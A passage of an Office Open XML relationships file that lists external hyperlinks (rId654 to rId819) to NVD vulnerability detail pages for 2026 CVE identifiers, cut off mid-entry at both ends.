Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86108" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86109" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86894" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86895" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86904" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87776" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87908" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88032" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88852" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88853" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89028" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89063" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89863" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89897" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89968" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89971" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89974" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92128" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92129" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92577" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92594" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92596" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92599" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92625" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92626" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92719" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92784" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92791" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92792" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92794" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92815" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9336" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20222" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42784" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61590" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61592" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84003" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85152" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89157" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56839" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61409" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64752" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71179" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78135" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79643" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79691" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84611" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84632" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85386" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86754" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89910" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92399" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92406" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92718" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17526" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18595" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27560" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27561" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27562" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27563" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27564" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76424" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80127" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81468" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87021" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87024" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87976" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92469" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12756" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13107" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13275" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13285" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13287" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19248" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20300" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20683" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40856" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61596" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61598" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61915" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66305" TargetMode="External" Id="rId737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73175" TargetMode="External" Id="rId738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73462" TargetMode="External" Id="rId739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73468" TargetMode="External" Id="rId740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80380" TargetMode="External" Id="rId741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82052" TargetMode="External" Id="rId742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82054" TargetMode="External" Id="rId743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82055" TargetMode="External" Id="rId744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82057" TargetMode="External" Id="rId745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82058" TargetMode="External" Id="rId746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82065" TargetMode="External" Id="rId747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82068" TargetMode="External" Id="rId748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82070" TargetMode="External" Id="rId749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82073" TargetMode="External" Id="rId750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82074" TargetMode="External" Id="rId751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84548" TargetMode="External" Id="rId752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84565" TargetMode="External" Id="rId753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86757" TargetMode="External" Id="rId754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86758" TargetMode="External" Id="rId755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86759" TargetMode="External" Id="rId756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86765" TargetMode="External" Id="rId757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86766" TargetMode="External" Id="rId758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87072" TargetMode="External" Id="rId759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87998" TargetMode="External" Id="rId761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87999" TargetMode="External" Id="rId762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8821" TargetMode="External" Id="rId763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89792" TargetMode="External" Id="rId764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89818" TargetMode="External" Id="rId765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89826" TargetMode="External" Id="rId766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89838" TargetMode="External" Id="rId767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89840" TargetMode="External" Id="rId768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89912" TargetMode="External" Id="rId769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89927" TargetMode="External" Id="rId770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90016" TargetMode="External" Id="rId771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90017" TargetMode="External" Id="rId772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90555" TargetMode="External" Id="rId773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90927" TargetMode="External" Id="rId774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91197" TargetMode="External" Id="rId775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92299" TargetMode="External" Id="rId776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92456" TargetMode="External" Id="rId777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92459" TargetMode="External" Id="rId778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92582" TargetMode="External" Id="rId779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92601" TargetMode="External" Id="rId780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92602" TargetMode="External" Id="rId781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92753" TargetMode="External" Id="rId782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92772" TargetMode="External" Id="rId783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92773" TargetMode="External" Id="rId784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92804" TargetMode="External" Id="rId785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68840" TargetMode="External" Id="rId786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68904" TargetMode="External" Id="rId787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69319" TargetMode="External" Id="rId788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69413" TargetMode="External" Id="rId789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69422" TargetMode="External" Id="rId790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69814" TargetMode="External" Id="rId791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69816" TargetMode="External" Id="rId792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69817" TargetMode="External" Id="rId793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69818" TargetMode="External" Id="rId794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69834" TargetMode="External" Id="rId795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69838" TargetMode="External" Id="rId796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69859" TargetMode="External" Id="rId797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69866" TargetMode="External" Id="rId798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69889" TargetMode="External" Id="rId799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69891" TargetMode="External" Id="rId800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69896" TargetMode="External" Id="rId801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69911" TargetMode="External" Id="rId802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70283" TargetMode="External" Id="rId803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70562" TargetMode="External" Id="rId804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70565" TargetMode="External" Id="rId805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70567" TargetMode="External" Id="rId806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70568" TargetMode="External" Id="rId807" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71332" TargetMode="External" Id="rId808" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71333" TargetMode="External" Id="rId809" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73022" TargetMode="External" Id="rId810" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73435" TargetMode="External" Id="rId811" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73438" TargetMode="External" Id="rId812" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73446" TargetMode="External" Id="rId813" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73450" TargetMode="External" Id="rId814" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73459" TargetMode="External" Id="rId815" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73460" TargetMode="External" Id="rId816" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77407" TargetMode="External" Id="rId817" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77894" TargetMode="External" Id="rId818" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77899" TargetMode="External" Id="rId819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 